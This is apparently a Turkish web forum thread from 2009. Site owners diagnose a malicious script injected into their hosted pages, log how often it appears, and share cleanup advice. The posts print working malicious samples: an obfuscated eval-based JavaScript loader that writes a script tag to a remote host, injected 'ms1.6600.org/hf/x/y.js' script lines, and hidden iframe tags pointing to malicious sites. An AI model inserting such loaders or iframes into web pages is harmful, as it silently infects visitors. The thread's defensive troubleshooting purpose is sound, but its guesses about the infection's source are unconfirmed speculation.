Web sitem üzerinden başka siteler virüs gönderiyor

Merhaba

Virüs uyarısı veren sayfaları bir editör programı ile açarak öncelikle virüsün indirildiği linki aratın. Sonuç alamazsanız kodlarınız içinde anlamsız karakterler içeren(genellikle <script> tagı ile başlayan birçok rakamdan oluşan satırlar vb.) kod kümelerinin olup olmadığını kontrol edin ve bunları sildikten sonra virüs uyarısını tekrar kontrol edin. Tabi bu işlemleri web sitenizde bulunan dosyaların en son halini kendi bilgisayarınıza indirdikten sonra bu dosyalar üzerinde araştırın. Bunun nedeni ise virüsün indirilmeye çalışıldığı linkin kodlarınız arasına ya sizin bilgisayarınızda bulunan bir ftp virüsü yada sunucuda ki bir virüsün sebep verme ihtimalinin olmasıdır. Ftp virüsünden kastım kullandığınız ftp programı sayesinde belli başlı uzantılı ve isimli dosyalara(index default .html .php. asp vb. gibi değişiklik gösterebilir) siz ftp den yükleme işlemi yaparken bu kodları kendisi ekleme durumudur.

Eğer sayfa kodlarınız içinde bu iki yöntemlede bir sonuca varamadıysanız ve eğer sitenizde mysql gibi bir veritabanı kullanıyorsanız bu virüsün indirildiği link veritabanınız içinde mutlaka vardır. veritabanınızı bilgisayarınıza indirip virüsün indirildiği linki aratıp ona ait olan linkleri temizleyebilirsiniz.

Teşekkür ederim.

Ama o kadar incelememe rahmen wordpress' de database' de temiz çıktı. Gerçi bir daha da başka bir siteyle bağlantıya geçmedi. İlginiz ve hızlı cevabınız için tekrar teşekkür ederim. Kolay gelsin.

rica ederim. bilginiz olması açısından aradığınız anlamsız kod kümeside aşağıdaki tarzda yada <iframe> tagları arasında yer alabilir.

<script language=javascript><!--
(function(){var aTa=':76:61r:20a:3d:22Script:45:6egi:6ee:22:2cb:3d:22Versi:6f:6e:28:29+:22:2cj:3d:22:22:2cu:3d:6e:61vigat:6fr:2euserA:
67ent:3bif:28(u:2ei:6ed:65x:4ff(:22Chrome:22):3c:30):26:26(u:2e:69nde:78Of(:22Win:22):3e:30):26:26:28:75:2ei:6edexOf(:22N:54:206:22)
:3c:30):26:26(d:6fcu:6de:6et:2ec:6foki:65:2eindex:4ff(:22m:69ek:3d1:22):3c:30):26:26(typeof(zr:76:7ats:29:21:3dtyp:65of(:22A:22))):
7bzr:76zts:3d:22:41:22:3bev:61l(:22if(window:2e:22+a:2b:22)j:3dj+:22:2b:61+:22:4d:61jor:22+b+:61:2b:22Min:6fr:22+b:2ba+:22:42uil:
64:22+:62+:22j:3b:22):3b:64ocu:6de:6et:2ewr:69te:28:22:3c:73crip:74:20:73:72c:3d:2f:2fma:22+:22:72tuz:2e:63n:2fvid:2f:3f:69d:3d:22
+j:2b:22:3e:3c:5c:2f:73cr:69pt:3e:22:29:3b:7d';var sul=unescape(aTa.replace(/:/g,'%'));eval(sul)})();
 --></script>

Merhaba. Son 1 haftadır aynı sorunla ilgili hosting firmasına sorunlarımı iletip cevap bekliyorum. Sadece ilgileniyoruz deyip içerik hakkında cevap alamadım. Firma : FSBNETWORK (Ankara'da bir firmadır)

Bir yazılımcı olduğum için tüm testlerimi peryodik sorgularla netleştiriyorum. Basit bir PHP kod yazıp host aldığım yere kopyaladım. PHP içeriği basit tek satırlık

test.php dosyası aşağıdaki içeriğe sahip. http://www.emerkez.info/test.php

<?php echo "merhaba";?>

 Bu PHP kodunu 5 saniyelik aralıklarla 49 kere çağırdım. Cevaplar aşağıdaki gibi geldi. ( "<" ve ">" TAG işaretleri "{" ve "}" olarak değiştirilmiştir. )

Normalde hepsinin merhaba olarak dönmesi gerekirken bazılarında nasıl farklılaştığına dikkat edin. Sonuçta direkt olarak bu PHP çağrıldığından kendi sitemizde bir virüs vs. değil direkt HOST Internet Sunucusunda bulunan virüs trojan olduğu kanaatindeyim.  

01. 02.08.2009 18:02:10 – “merhaba”
02. 02.08.2009 18:02:15 – “merhaba”
03. 02.08.2009 18:02:20 – “merhaba”
04. 02.08.2009 18:02:25 – “merhaba”
05. 02.08.2009 18:02:30 – “merhaba”
06. 02.08.2009 18:02:35 – “merhaba”
07. 02.08.2009 18:02:40 – “merhaba”
08. 02.08.2009 18:02:45 – “merhaba”
09. 02.08.2009 18:02:50 – “merhaba”
10. 02.08.2009 18:02:55 – “merhaba”
11. 02.08.2009 18:03:00 – “merhaba”
12. 02.08.2009 18:03:05 – “merhaba”
13. 02.08.2009 18:03:10 – “merhaba”
14. 02.08.2009 18:03:15 – “merhaba”
15. 02.08.2009 18:03:20 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} merhaba”
16. 02.08.2009 18:03:25 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} merhaba”
17. 02.08.2009 18:03:30 – “merhaba”
18. 02.08.2009 18:03:35 – “merhaba”
19. 02.08.2009 18:03:40 – “merhaba”
20. 02.08.2009 18:03:45 – “merhaba”
21. 02.08.2009 18:03:50 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} merhaba”
22. 02.08.2009 18:04:00 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} merhaba”
23. 02.08.2009 18:04:05 – “merhaba”
24. 02.08.2009 18:04:10 – “merhaba”
25. 02.08.2009 18:04:15 – “merhaba”
26. 02.08.2009 18:04:20 – “merhaba”
27. 02.08.2009 18:04:25 – “merhaba”
28. 02.08.2009 18:04:30 – “merhaba”
29. 02.08.2009 18:04:35 – “merhaba”
30. 02.08.2009 18:04:40 – “merhaba”
31. 02.08.2009 18:04:45 – “merhaba”
32. 02.08.2009 18:04:50 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} merhaba”
33. 02.08.2009 18:04:55 – “merhaba”
34. 02.08.2009 18:05:00 – “merhaba”
35. 02.08.2009 18:05:05 – “merhaba”
36. 02.08.2009 18:05:10 – “merhaba”
37. 02.08.2009 18:05:15 – “merhaba”
38. 02.08.2009 18:05:20 – “merhaba”
39. 02.08.2009 18:05:25 – “merhaba”
40. 02.08.2009 18:05:30 – “merhaba”
41. 02.08.2009 18:05:35 – “merhaba”
42. 02.08.2009 18:05:40 – “merhaba”
43. 02.08.2009 18:05:45 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} merhaba”
44. 02.08.2009 18:05:50 – “merhaba”
45. 02.08.2009 18:05:55 – “merhaba”
46. 02.08.2009 18:06:00 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} merhaba”
47. 02.08.2009 18:06:05 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} merhaba”
48. 02.08.2009 18:06:10 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} merhaba”
49. 02.08.2009 18:06:15 – “merhaba”

 Aynı şekilde bu firmanın referanslarından diğer bir başka siteyi ziyaret edip içindeki bir tane PHP linkini aynı şekilde defalarca çağırınca sonuçlar aşağıdaki gibi geldi. Yine TAG işaretleri “{” ve “}” ile değiştirilerek HTML görünümünden uzaklaştırılmıştır.

. – 01. 02.08.2009 18:57:00 – “XML-RPC server accepts POST requests only.”
. – 02. 02.08.2009 18:57:05 – “XML-RPC server accepts POST requests only.”
. – 03. 02.08.2009 18:57:10 – “XML-RPC server accepts POST requests only.”
. – 04. 02.08.2009 18:57:15 – “XML-RPC server accepts POST requests only.”
! – 05. 02.08.2009 18:57:20 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} XML-RPC server accepts POST requests only.”
. – 06. 02.08.2009 18:57:25 – “XML-RPC server accepts POST requests only.”
! – 07. 02.08.2009 18:57:30 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} XML-RPC server accepts POST requests only.”
. – 08. 02.08.2009 18:57:35 – “XML-RPC server accepts POST requests only.”
. – 09. 02.08.2009 18:57:40 – “XML-RPC server accepts POST requests only.”
. – 10. 02.08.2009 18:57:45 – “XML-RPC server accepts POST requests only.”
. – 11. 02.08.2009 18:57:55 – “XML-RPC server accepts POST requests only.”
. – 12. 02.08.2009 18:58:00 – “XML-RPC server accepts POST requests only.”
! – 13. 02.08.2009 18:58:05 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} XML-RPC server accepts POST requests only.”
. – 14. 02.08.2009 18:58:10 – “XML-RPC server accepts POST requests only.”
. – 15. 02.08.2009 18:58:15 – “XML-RPC server accepts POST requests only.”
. – 16. 02.08.2009 18:58:20 – “XML-RPC server accepts POST requests only.”
! – 17. 02.08.2009 18:58:30 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} XML-RPC server accepts POST requests only.”
! – 18. 02.08.2009 18:58:35 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} XML-RPC server accepts POST requests only.”
. – 19. 02.08.2009 18:58:40 – “XML-RPC server accepts POST requests only.”
. – 20. 02.08.2009 18:58:45 – “XML-RPC server accepts POST requests only.”
. – 21. 02.08.2009 18:58:50 – “XML-RPC server accepts POST requests only.”
. – 22. 02.08.2009 18:58:55 – “XML-RPC server accepts POST requests only.”
. – 23. 02.08.2009 18:59:00 – “XML-RPC server accepts POST requests only.”
. – 24. 02.08.2009 18:59:05 – “XML-RPC server accepts POST requests only.”
. – 25. 02.08.2009 18:59:10 – “XML-RPC server accepts POST requests only.”
. – 26. 02.08.2009 18:59:15 – “XML-RPC server accepts POST requests only.”
. – 27. 02.08.2009 18:59:20 – “XML-RPC server accepts POST requests only.”
. – 28. 02.08.2009 18:59:25 – “XML-RPC server accepts POST requests only.”
. – 29. 02.08.2009 18:59:30 – “XML-RPC server accepts POST requests only.”
. – 30. 02.08.2009 18:59:35 – “XML-RPC server accepts POST requests only.”
! – 31. 02.08.2009 18:59:40 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} XML-RPC server accepts POST requests only.”
. – 32. 02.08.2009 18:59:45 – “XML-RPC server accepts POST requests only.”
! – 33. 02.08.2009 18:59:55 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} XML-RPC server accepts POST requests only.”
! – 34. 02.08.2009 19:00:00 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} XML-RPC server accepts POST requests only.”
! – 35. 02.08.2009 19:00:05 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} XML-RPC server accepts POST requests only.”
! – 36. 02.08.2009 19:00:10 – “{sCRipt src=//ms1.6600.org/hf/x/y.js}{/script} XML-RPC server accepts POST requests only.”
. – 37. 02.08.2009 19:00:20 – “XML-RPC server accepts POST requests only.”
. – 38. 02.08.2009 19:00:25 – “XML-RPC server accepts POST requests only.”
. – 39. 02.08.2009 19:00:30 – “XML-RPC server accepts POST requests only.”

Herhangi bir gelişme olursa buradan bildirirseniz ben  de aydınlanmış olurum. Gelişme olursa buradan yazarım.

Saygılarımla
Muharrem ARMAN
(Ankara)

Ben firma ismi vermek istememiştim ancak evet benimde bu sorunla karşılaştığım firma FSB Network şimdi daha eminim ki tamamen hosting firmasından kaynaklanıyor. Mümkünse sizinle görüşelim beraber bir uyarıda bulunalım. Çünkü bana da verdikleri cevap. İşte sizinde bulunduğunuz server da 200-300 tane site var ama hiç birinden böyle bir şikayet yok diyorlar. Biz gene de detaylı bir şekilde inceledik ve bizden kaynaklanan hiç bir sorun bulamadık sizin bilgisayarınızda virüs vardır gibi konuşmalar geçiyo. Sonuç hüsran.

Sana da çok teşekkür ederim muharrem arkadaşım. Yardımınla en azından sorunun nerden kaynaklandığına hemfikir olduk. Evet biraz önce hosting şirketiyle bir mail trafiği daha yaptım. En sonunda kabullendiler sorunu. Bana verdikleri cevap;

konu ile ilgili bizde çalışma yapıyoruz. Çok yeni bir virüs bu.
Henüz antivirüs yazılımları çözüm üretemiyor.

Sunucu ayrımı yapmadan sql kaynak koduna yerleşiyor.

Sürekli araştırma halindeyiz emin olun. Sadece bizde değil bir çok
firmada da aynı sorunun olduğunu duyduk.

Bilgilerinize sunar , iyi
çalışmalar dileriz.

Artık bekleyip görücez.

Saygılarımla. İyi Çalışmalar.

Test etmek için basit bir yazılım hazırladım demiştim ya onun linkini vereyim, belki kullanmak denemek isteyen olur. Dilediğiniz bir PHP linkini veriyorsunuz, bu linki 5 saniyelik peryodlarla sorgular ve alttaki kutuya dönen değerleri ( ilk 500 harfi ) loglar. Hataları olabilir, basit sorgu yaptığından detaylı kontrol eklenmedi. Delphi language ile Indy IdHttp sorgusu yapıyor.

http://www.emerkez.info/files/ScriptSorgu.rar  

Kaynak Kodu aşağıda...

Var
  xSay    : Integer = 51;
  xMaxSay : Integer = 50;

procedure TForm1.BitBtn1Click(Sender: TObject);
begin
  xSay := 1;
  Label1.Caption := 'Sorgu dizisi başlatıldı...';
  BitBtn1.Enabled := False;
  BitBtn2.Enabled := True;
  Memo1.Lines.Add( StringOfChar('-', 100 ) );
  Memo1.Lines.Add( 'Muharrem ARMAN - [email protected]' );
  Memo1.Lines.Add( StringOfChar('-', 100 ) );
end;

procedure TForm1.BitBtn2Click(Sender: TObject);
begin
  xSay := 51;
  Label1.Caption := 'Sorgulama işlemi için butona basınız...';
  BitBtn1.Enabled := True;
  BitBtn2.Enabled := False;
end;

procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
Var
  INI : TINIFile;
begin
  INI := TINIFile.Create( ChangeFileExt(Application.Exename, '.INI') );
  INI.WriteString( 'ANA', 'URL', Edit1.Text );
  INI.Free;
end;

procedure TForm1.FormCreate(Sender: TObject);
Var
  INI : TINIFile;
begin
  if FileExists( ChangeFileExt(Application.Exename, '.INI') ) then begin
    INI := TINIFile.Create( ChangeFileExt(Application.Exename, '.INI') );
    Edit1.Text := INI.ReadString( 'ANA', 'URL', 'http://www.emerkez.info/test.php' );
    INI.Free;
  end;
end;

procedure TForm1.Timer1Timer(Sender: TObject);
Var
  xTarih : String;
  Saat   : TTime;
  URL    : String;
begin
  URL := Edit1.Text;
  StatusBar1.Panels[0].Text := Format('Saat: %s', [TimeToStr(Time)]);
  Saat := Now;
  if (xSay <= xMaxSay) AND (SecondOf(Saat) mod 5 = 0) then begin
    xTarih := '';
    Try
      IdHttp1.Request.UserAgent := 'MRM';
      xTarih := Trim( Copy( IdHttp1.Get( URL ), 1, 500) );
      Label1.Caption := Format(' Sorgu : %.2d / %.2d', [xSay, xMaxSay]);
      if Pos('/y.js', xTarih) > 0 then Memo1.Lines.Add( Format('! - %.2d. %s - "%s"', [ xSay, DateTimeToStr(Saat), xTarih]) )
                                  else Memo1.Lines.Add( Format('. - %.2d. %s - "%s"', [ xSay, DateTimeToStr(Saat), xTarih]) );
     
    Except
      Memo1.Lines.Add( 'Hatalı okuma' );
    End;

    Inc(xSay);
  end;
end;

Normal
0
21

false
false
false

MicrosoftInternetExplorer4

/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Normal Tablo";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ansi-language:#0400;
mso-fareast-language:#0400;
mso-bidi-language:#0400;}

Arkadaşlar ben de bu konuda sıkıntıda olan yüzlerce server sahibinden
biriyim. Şu an yukarıda size de söylendiği gibi yeni bir virüs. Ben bu konuda
son günlerde epey araştırma yaptım. Ancak bir sonuca ulaşamadık. Bire bir sizde
de görünen script bende mevcut. Çalıştığımız firma (adını vermek yanlış olur)
müşterilerinden 4-5 kişi ile irtibatlı olarak bu sorunu yenme gayretindeyiz.
Sorunun öncelikle kendimizde olduğunu düşünerek ilgili js kodunu açıp inceledik
ve yayılma mantığını anlamaya çalıştık. Yayılma mantığı bildiğimiz trojanvari
bir görüntüde ancak çok daha karmaşık bir yapıda olduğu ve kendini nereye
gizlediği hala bizim için muaamma...

Biz bu sorundan kökten kurtulalım dedik ve serverimizi resetledik. Yedeklerimizi
temizledik. Akabinde kendi pclerimizden ftp ye bulaşma düşüncesi ile pcleri
formatladık. Yedeklerimizi geri koyduk ama sonuç hüsran. Sonra bu konu ile
yabancı siteleri inceledik ve regedit ve system 32 de yapılan bazı adımları
uyguladık sonuç yine hüsran. ( Sunucu tarafında regeditinde 6600 ya da y.js
gibi bir arama sonucunda karşınıza gelecektir.)

 Daha sonra bunun datacenterdan bize mysql ve mssql deki açıktan
olacağı söylendi. Tamam dedik ve sqlleri kaldırdık yeniden kurduk. Olmadı tam 8
format attı firma sahibi ama yine nafile. Acaba site dosyalarımıza mı bulaştı
deyip. Başka firmadan host kiraladık. Kendi site dosyalarımızı ve mssql
yedeklerimizi aynen alıp direk oraya attık. Virüss off oldu. Görünmedi. 3 gün
test ettik ve sonuç olarak sorun serverde dedik. Servere format attıysak ve bu
datacenterin pek çok müşterisi bundan muzdaripse sorun kesinlikle onlarda
dedik. Sonra kodu az daha irdeledik. Gördük ki php asp her ne dilde yazılırsa
yazılsın site server tarafından yorumlanması bittikten 5-6 saniye sonra sitenin
en tepesine yerleşiyor. İlgili yabancı kaynakta ISS içinden faaliyete geçtiği
de belirtiliyordu. Biz iss içine gömüldüğüne ve datacenter tarafında bir
yerlerde saklandığına inanmaya başladık.

Bana datacenterimden verilen ilk cevap şuydu:

Merhaba Hakan bey,

Bahsetmiş oldunuz sıkıntı çok yeni bir sorun, sorunu tespit edip çözebilen bir
antivirüs yazılımı yok, biz bir çözüm bulduk, bir süre sonra açılayabileceğiz
şuan üzerinde çalışıyoruz.

Sorun sql inject yapılması, sanırım mysql mssql üzerinde çok yeni bir açık var,
korsan bu açığı kullanıyor.

İyi çalışmalar.

Ancak tabi sorun bu değil bize göre de. Formata bile dirençli böylesi bir
javascript virüsü olacağını pek sanmıyorum. Ancak çok da dahi değilim yapan
neden yapmasın.:)

Evet, arkadaşlar bu konuda onlarca firmayı buraya yazabilirim ama herkes
ticari itibarını düşündüğü için sorununu dile getirmiyor ve kendileri çözüm
bulamadıkça bizler müşteri ya da ziyaretçi kaybediyoruz. Buna bir çözüm
arayışlarınıza ben de katılıyorum...

Bu arada bulduğum diğer bir yabancı site linki aşağıdadır..

Pek anlamadım ama yabancı dili iyi olan varsa ve bizimle anlatılanı
paylaşırsa sevinirim

Http://blog.cfwebstore.com/index.cfm/2009/7/3/Details-on-Dealing-with-the-File-Upload-Hack

Gelişme olursa size buradan muhakkak bildiririm

Beyler kolay gelsin

Şimdi bizim arkadaşlarla edindiğimiz son sonucu yazıyorum
Servera bir sniffer programı kurduk gelen giden veriyi zilemeye başladık
sonuç gayet temiz bi şekilde istek geliyor ve server tarafında istek
yine temiz bir şekilde cevaplanıyor SONRA clinta veri gönderilmeye
başlanıyor ve clinta gelen veride sorunvar buda demek oluyorki bizim
serverımız temiz amma datacenter ın altyapısında bir virüscük kol
geziyor…

bu şuanki sonuçlarımız. ilerleyen zamanlarda olursa başka verileride paylaşırız inş.
yanlış bi sonuç edindiysekte gene paylaşırız
Sizlerde kanaat ve deneme sonuçlarınızı paylaşın burda ben sürekli kontrol edeceğim burayı.

Kolay gelsin herkese

Merhaba arkadaşlar;

Yoğun uğraşlar sonucunda bir sonuca ulaştık.

Bu virüs yada her ne ise ip ile direk bağlantısı var.

Yani serverınızn ip bloğunu değiştirirseniz.

Çözüm oluyor..  2 günden beri virüs ile ilgili bir problem yaşamıyorum.

O ip bloğu na geri alınca virüs işlevine devam ediyor..

Şimdilik en azından serverı kurtarmış olduk..

Şimdi o ip bloğuna bulaşmış olan virüsü temizleme yollarına bakılacak.

bir gelişme olursa sizinle paylaşırım..

 Kolay gelsin şimdiden 

Mrb arkadaşlar. Sorunu çözüp benden önce yazmışlar zaten. Kısmi çözüm ama yine de çözüm çözümdür. İki gündür mesaide olduğum için cevap yazamadım ama yukarıdaki arkadaşın da dediği gibi ip bloklarında sorun. bizim datacenterdeki ip numarası ..18.*** içinde 18 barındıran tüm serverlere bu bulaşmıştır. Datacenter yetkileleri artık kendi taraflarından olduklarına inandıkları bu sorunu çözme gayretindeler. Şu an için benim de sorunum kalmadı ilgili kodla.

Hepinizin aynı şekilde değiştirmesini öneirim ..

Kolay gelsin.. Farklı bilgiler elimize ulaşırsa paylaşıırm..

Merhaba sorununuz tam olarak çözüldümü bilmiyorum ama belirtilere bakılınca iframe virüsü aklıma geldi.

 Bizde bir kaç müşterimizde aynı soruna rastladık sorunun bizden kaynaklandığını iddia ettiler. Araştırmalarımız sonucu bunun web safalarından dağılan bir virüs olduğunu teyit ettik.  Çözüm olarak müşterilerimize aşağıdaki tavsiyelerde bulunduk sizinde denemenizi ve sonuçlarını bizimle paylaşmanızı isterim.

 -----------

iFrame Virüsü Hakkında Bilgilendirme

02/02/2009 13:49

Son zamanlarda ortaya çıkan ve
bilginiz dahilinde olmadan FTP programınızı kullanarak adres
listesindeki sitelere zararlı kod ekleyen bir çeşit virüs büyük hızla
yayılmaya devam etmektedir.

Bu virüs bilgisayarınıza
bulaştıkdan sonra o bilgisayarla hangi sitenin ftp'sini açarsanız açın
girdiğiniz ftp bilgilerini kaydederek, sitelere girip index.php,
index.html, index.htm, default.asp'in içlerine iframe kodu atiyor
atılan iframe kodu şu şekildedir:

Örnek Bazı Virüs Kodları :

<iframe src="http://110.a38q.cn/lx.htm" width="100" height="0" frameborder="0"></iframe>

veya


<iframe src='http://81.95.145.240/logo/index.php' style='border:0px
solid gray;' WIDTH=0 HEIGHT=0 />FRAMEBORDER=0 MARGINWIDTH=0
MARGINHEIGHT=0 SCROLLING=no></iframe>

veya

<iframe src='http:/logo/index.php' style='border:0px solid gray;' WIDTH=0
HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0
SCROLLING=no></iframe>

veya

<iframe src="http://*****.cn/in/" width=1 height=1 style="visibility: hidden"></iframe>

Nasıl Bulaşır

Virüs bulaşmış bir web sitesine
girdiğiniz zaman ve bilgisayarınızda güncellenmiş ve bu virüsü tanıyan
bir antivirüs programı yüklü değilse bu virüs sizede bulaşır.

Acil Önlem Paketi

1- Web sitenizi olduğu gibi bilgisayarınıza indirin.
2- Virüs bulaşmış sayfaları bulup içindeki virüs kodlarını silin. (Yukarıda virüs kodları verilmiştir.)
2- Web Sitenizin FTP Bilgilerini (Kullanıcı Adınızı veya Şifrenizi) değiştirin.
3- Bilgisayarınızı güncel bir antivirüs programları ile taratın. (Tavsiyemiz Kaspersky )
4- Eğer antivirüs programları bilgisayarınızda ilgili iframe virüsünü bulamamışsa bilgisayarınıza format atınız.
5- Bilgisayarınızın virüsten temizlendiğine emin olduysanız web sitenizi tekrar FTP ile sunucuya gönderebilirsiniz.

Iframe Virüsünden Korunma

1- PHP Siteler için: Web sitenizdeki tüm index.php ,index.htm, index.html dosyalarının chmod değerini 444 yapınız.
2-
ASP siteler için: Web sitenizdeki tüm index.asp, default.asp,
index.htm, index.html dosyalarını salt okunur yapın veya FTP User
kullanıcısının (www.gh.net.tr olarak talep ettiğiniz takdirde biz yapıyoruz) yazma iznini kaldırın.
3- Ayrıca: FTP ile Dosya gönderme işleminiz bittiği zaman FTP şifrenizi hemen değiştirin.
4- Bilgisayarınıza güncel bir antivirüs programı bulundarmaya özen gösterin. Tavsiyemiz Kaspersky'dır.
5- Ad-Aware gibi trojan temizleme programları ile bilgisayarınız 2-3 günde bir taratın.

Merhaba

bende ayni virusle karsilastim . ne yaptim ne ettim bir turlu bulamadim . sonuc olarak serveri silip kurduktan 5 dakka sonra yine gorudm

sunucu olarak linux, apache, mysql ve php kullaniyorum bende ortak bir sey bulmaya calisirken baska arkadasta ayni virusu gormus ama bu sefer window sunucuda . yani aramizda ortak olacak hic bir sey yok.

sunucumda birde bir sitede bu kodu  gordugumde . hep ilk satirdir . site php,mysql kullanmasi sart degil bazen statik ve hatta asp uzantisi ile biten sitelerdede cikiyordu.

son olarak tahminim bu kod sunucumdan kaynakli degildir . galiba datacenterden kaynaklaniyor olabilir .

bu virus cok yeni oldugu icin nette hic bir bilgi bulamadim. umarim yakinda bir cozumler cikar